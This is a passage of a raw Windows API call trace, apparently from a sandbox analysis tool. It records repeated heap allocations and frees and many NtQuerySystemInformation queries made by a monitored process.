hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df6380 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df4a90 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df4ad0 | out: hHeap=0x27fc8db0000) returned 1 [0179.127] GetProcessHeap () returned 0x27fc8db0000 [0179.127] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dbad00 | out: hHeap=0x27fc8db0000) returned 1 [0179.127] GetProcessHeap () returned 0x27fc8db0000 [0179.127] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df4c10 | out: hHeap=0x27fc8db0000) returned 1 [0179.127] GetProcessHeap () returned 0x27fc8db0000 [0179.127] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de6d50 | out: hHeap=0x27fc8db0000) returned 1 [0179.128] GetProcessHeap () returned 0x27fc8db0000 [0179.128] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df63b0 | out: hHeap=0x27fc8db0000) returned 1 [0179.128] GetProcessHeap () returned 0x27fc8db0000 [0179.128] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc8de6d50 [0179.128] GetProcessHeap () returned 0x27fc8db0000 [0179.128] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc8df6180 [0179.128] GetProcessHeap () returned 0x27fc8db0000 [0179.128] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x11c) returned 0x27fc8dbad00 [0179.130] GetProcessHeap () returned 0x27fc8db0000 [0179.130] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x128) returned 0x27fc8dbb7b0 [0179.130] GetProcessHeap () returned 0x27fc8db0000 [0179.130] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc8df42d0 [0179.130] GetProcessHeap () returned 0x27fc8db0000 [0179.130] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x130) returned 0x27fc8de8760 [0179.130] GetProcessHeap () returned 0x27fc8db0000 [0179.130] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc8de88a0 [0179.130] GetProcessHeap () returned 0x27fc8db0000 [0179.130] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc8df6270 [0179.130] GetProcessHeap () returned 0x27fc8db0000 [0179.130] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de8620 | out: hHeap=0x27fc8db0000) returned 1 [0179.131] GetProcessHeap () returned 0x27fc8db0000 [0179.131] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1e4) returned 0x27fc8de8950 [0179.132] GetProcessHeap () returned 0x27fc8db0000 [0179.132] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x104) returned 0x27fc8dd1b20 [0179.132] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff468 | out: phModule=0xf7a67ff468*=0x7ffcea380000) returned 1 [0179.132] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0179.132] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xf7a67ff590, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xf7a67ff590, ResultLength=0x0) returned 0x0 [0179.132] GetProcessHeap () returned 0x27fc8db0000 [0179.132] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc8df4dd0 [0179.132] GetProcessHeap () returned 0x27fc8db0000 [0179.132] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x50) returned 0x27fc8dfa160 [0179.132] GetProcessHeap () returned 0x27fc8db0000 [0179.132] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc8de8620 [0179.133] GetProcessHeap () returned 0x27fc8db0000 [0179.133] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc8df6130 [0179.133] GetProcessHeap () returned 0x27fc8db0000 [0179.133] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x40) returned 0x27fc8dc1e10 [0179.133] GetProcessHeap () returned 0x27fc8db0000 [0179.133] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dbb7b0 | out: hHeap=0x27fc8db0000) returned 1 [0179.133] GetProcessHeap () returned 0x27fc8db0000 [0179.133] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de8760 | out: hHeap=0x27fc8db0000) returned 1 [0179.133] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de88a0 | out: hHeap=0x27fc8db0000) returned 1 [0179.134] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df6270 | out: hHeap=0x27fc8db0000) returned 1 [0179.134] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df42d0 | out: hHeap=0x27fc8db0000) returned 1 [0179.134] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de8950 | out: hHeap=0x27fc8db0000) returned 1 [0179.134] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dd1b20 | out: hHeap=0x27fc8db0000) returned 1 [0179.134] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dfa160 | out: hHeap=0x27fc8db0000) returned 1 [0179.134] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de8620 | out: hHeap=0x27fc8db0000) returned 1 [0179.134] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df6130 | out: hHeap=0x27fc8db0000) returned 1 [0179.134] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df4dd0 | out: hHeap=0x27fc8db0000) returned 1 [0179.134] GetProcessHeap () returned 0x27fc8db0000 [0179.134] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dc22c0 | out: hHeap=0x27fc8db0000) returned 1 [0179.135] GetProcessHeap () returned 0x27fc8db0000 [0179.135] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dbad00 | out: hHeap=0x27fc8db0000) returned 1 [0179.135] GetProcessHeap () returned 0x27fc8db0000 [0179.135] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dc1e10 | out: hHeap=0x27fc8db0000) returned 1 [0179.135] GetProcessHeap () returned 0x27fc8db0000 [0179.135] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de6d50 | out: hHeap=0x27fc8db0000) returned 1 [0179.135] GetProcessHeap () returned 0x27fc8db0000 [0179.135] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df6180 | out: hHeap=0x27fc8db0000) returned 1 [0179.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.140] GetProcessHeap () returned 0x27fc8db0000 [0179.140] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8de8aa0 [0179.140] GetProcessHeap () returned 0x27fc8db0000 [0179.140] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc8de2a90 [0179.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.292] GetProcessHeap () returned 0x27fc8db0000 [0179.292] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc440 [0179.292] GetProcessHeap () returned 0x27fc8db0000 [0179.292] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc8df0b60 [0179.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.294] GetProcessHeap () returned 0x27fc8db0000 [0179.294] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8dfcda0 [0179.294] GetProcessHeap () returned 0x27fc8db0000 [0179.294] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc8dfc980 [0179.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.294] GetProcessHeap () returned 0x27fc8db0000 [0179.294] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbcad0 [0179.294] GetProcessHeap () returned 0x27fc8db0000 [0179.294] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc8df09a0 [0179.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1f0, Length=0x50, ResultLength=0x0) [0179.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.213] GetProcessHeap () returned 0x27fc8db0000 [0180.213] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8def0a0 [0180.213] GetProcessHeap () returned 0x27fc8db0000 [0180.213] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc8dfc860 [0180.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.214] GetProcessHeap () returned 0x27fc8db0000 [0180.214] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8def2e0 [0180.214] GetProcessHeap () returned 0x27fc8db0000 [0180.214] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc8dfc500 [0180.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.216] GetProcessHeap () returned 0x27fc8db0000 [0180.216] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc440 [0180.216] GetProcessHeap () returned 0x27fc8db0000 [0180.216] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc8e024b0 [0180.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.217] GetProcessHeap () returned 0x27fc8db0000 [0180.217] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8e039c0 [0180.217] GetProcessHeap () returned 0x27fc8db0000 [0180.217] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc8dfc920 [0180.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.217] GetProcessHeap () returned 0x27fc8db0000 [0180.217] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd7f0 [0180.217] GetProcessHeap () returned 0x27fc8db0000 [0180.217] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc8e02330 [0180.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x50, ResultLength=0x0) [0180.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0180.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x50, ResultLength=0x0) [0182.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x50, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x50, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x50, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x50, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x50, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x50, ResultLength=0x0) [0182.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x38, ResultLength=0x0) [0182.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0182.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x28, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x38, ResultLength=0x0) [0182.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x28, ResultLength=0x0) [0182.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x28, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x38, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x38, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x20, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x20, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x20, ResultLength=0x0) [0182.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff130, Length=0x50, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff130, Length=0x50, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff130, Length=0x50, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x50, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x50, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x50, ResultLength=0x0) [0182.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x50, ResultLength=0x0) [0182.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0182.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedf0, Length=0x28, ResultLength=0x0) [0182.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0182.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x28, ResultLength=0x0) [0182.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x28, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x20, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0182.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 